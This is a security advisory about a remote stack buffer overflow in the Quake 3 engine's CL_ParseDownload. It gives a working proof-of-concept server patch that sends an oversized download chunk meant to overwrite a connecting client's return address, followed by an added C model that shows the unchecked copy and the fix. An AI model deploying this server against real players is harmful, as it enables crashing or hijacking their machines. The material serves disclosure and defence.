Quake 3 Engine CL_ParseDownload Remote Buffer Overflow Vulnerability

The server may be modified to send data sufficient to demonstrate this issue. Add the following code to the 'code/server/sv_client.c' source file, immediately after the '// send the gamestate' comment in SV_SendClientGameState (approximately line 575). The modified server replaces the normal gamestate with a single svc_download chunk whose advertised size, 16384 + 32 bytes, is larger than the fixed-size stack buffer that CL_ParseDownload copies the chunk into; the run of zero bytes keeps the chunk small on the wire because message bytes are Huffman-coded, and the trailing 32 'a' bytes are what lands past the end of the buffer.

// send the gamestate
{
	int i;                                 // own block, so the declaration is valid even under C89 compilers
	MSG_WriteByte( &msg, svc_download );
	MSG_WriteShort( &msg, -1 );            // block != 0: the client skips the file-size header and goes straight to the copy
	MSG_WriteShort( &msg, 16384 + 32 );    // amount of bytes to copy: 32 more than the client's 16384-byte buffer
	for ( i = 0; i < 16384; i++ ) {        // fill the client's data buffer
		MSG_WriteByte( &msg, 0x00 );       // 0x00 compresses well, saving space in the server's own message buffer
	}
	for ( i = 0; i < 32; i++ ) {           // the 32 bytes that spill past the end of the buffer
		MSG_WriteByte( &msg, 'a' );        // return address: 0x61616161
	}
	SV_SendMessageToClient( &msg, client );
	return;                                // skip the real gamestate; the crafted message is all the client receives
}
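The following is an added example, not code from the advisory or from the engine: a self-contained C model of the client-side chunk parsing that the server patch above targets, with the unchecked copy and the length check a fixed client needs side by side. It works on already-decoded message bytes (the real message is Huffman-coded), so only MAX_MSGLEN, the block/size wire layout and the 16384 + 32 payload are taken from the advisory; the msg_t layout, the helper names, the PARSE_* status codes and the decision to report an oversized copy instead of performing it are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_MSGLEN 16384

typedef struct {
    const unsigned char *data; /* decoded message bytes */
    int cursize;               /* valid bytes in data */
    int readcount;             /* read cursor */
} msg_t;

/* Little-endian 16-bit read in the spirit of MSG_ReadShort: -1 once past the end. */
static int read_short(msg_t *msg)
{
    int v;
    if (msg->readcount + 2 > msg->cursize) {
        msg->readcount = msg->cursize + 1;
        return -1;
    }
    v = (int16_t)(msg->data[msg->readcount] | (msg->data[msg->readcount + 1] << 8));
    msg->readcount += 2;
    return v;
}

enum { PARSE_OK = 0, PARSE_REJECTED = 1, PARSE_OVERFLOW = 2 };
static int last_copied; /* bytes the parser would copy into data[] on the last call */

/* One svc_download chunk: short block, [long file size if block == 0],
 * short size, then size bytes into a fixed 16384-byte stack buffer.
 * check_bounds == 0 models the unpatched parser, which trusts size; instead
 * of really writing past data[] it reports PARSE_OVERFLOW (assumption of this model).
 * check_bounds == 1 is the length check a fixed client must perform first. */
static int parse_download_chunk(msg_t *msg, int check_bounds)
{
    unsigned char data[MAX_MSGLEN];
    int block, size, avail;

    last_copied = 0;
    block = read_short(msg);
    if (block == 0)
        msg->readcount += 4;            /* block zero carries the total file size (a long) */
    size = read_short(msg);

    if (check_bounds && (size < 0 || size > (int)sizeof(data)))
        return PARSE_REJECTED;          /* hardened: drop the chunk before any copy */
    if (size > (int)sizeof(data)) {
        last_copied = size;             /* unpatched: the copy runs size - 16384 bytes past data[] */
        return PARSE_OVERFLOW;
    }
    if (size > 0) {
        avail = msg->cursize - msg->readcount;
        if (size > avail) size = avail; /* no real bytes exist past the end of the message */
        memcpy(data, msg->data + msg->readcount, (size_t)size);
        msg->readcount += size;
        last_copied = size;
    }
    return PARSE_OK;
}

/* Build one chunk (constructed test data, not captured traffic): header, then
 * up to 16384 zero bytes and 'a' bytes for anything beyond that, mirroring the
 * server-side patch above. Returns the total length, or -1 if it does not fit. */
static int build_chunk(unsigned char *out, int cap, int block, int size)
{
    int zeros = size < MAX_MSGLEN ? size : MAX_MSGLEN;
    if (size < 0 || cap < 4 + size) return -1;
    out[0] = (unsigned char)(block & 0xff);         /* little-endian short */
    out[1] = (unsigned char)((block >> 8) & 0xff);
    out[2] = (unsigned char)(size & 0xff);
    out[3] = (unsigned char)((size >> 8) & 0xff);
    memset(out + 4, 0x00, (size_t)zeros);
    memset(out + 4 + zeros, 'a', (size_t)(size - zeros)); /* 'aaaa' is 0x61616161 in memory */
    return 4 + size;
}

static unsigned char chunk_buf[4 + MAX_MSGLEN + 32];

/* Build a chunk and parse it; returns the parse status, last_copied holds the byte count. */
static int run_chunk(int block, int size, int check_bounds)
{
    msg_t msg;
    msg.data = chunk_buf;
    msg.cursize = build_chunk(chunk_buf, (int)sizeof chunk_buf, block, size);
    msg.readcount = 0;
    if (msg.cursize < 0) return -1;
    return parse_download_chunk(&msg, check_bounds);
}

int main(void)
{
    int st = run_chunk(-1, MAX_MSGLEN + 32, 0);
    printf("unpatched, size=%d: status %d, would copy %d bytes\n", MAX_MSGLEN + 32, st, last_copied);
    st = run_chunk(-1, MAX_MSGLEN + 32, 1);
    printf("patched,   size=%d: status %d, copied %d bytes\n", MAX_MSGLEN + 32, st, last_copied);
    st = run_chunk(1, 100, 1);
    printf("patched,   size=100: status %d, copied %d bytes\n", st, last_copied);
    return 0;
}
```

The unpatched path accepts whatever size the server advertises and would copy all 16416 bytes into a 16384-byte stack buffer, which is exactly the condition the server patch triggers; the hardened path rejects the chunk before the copy because the check compares size against the buffer's real capacity and also refuses a negative size rather than relying on a later `size > 0` test.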


 

Copyright 2010, SecurityFocus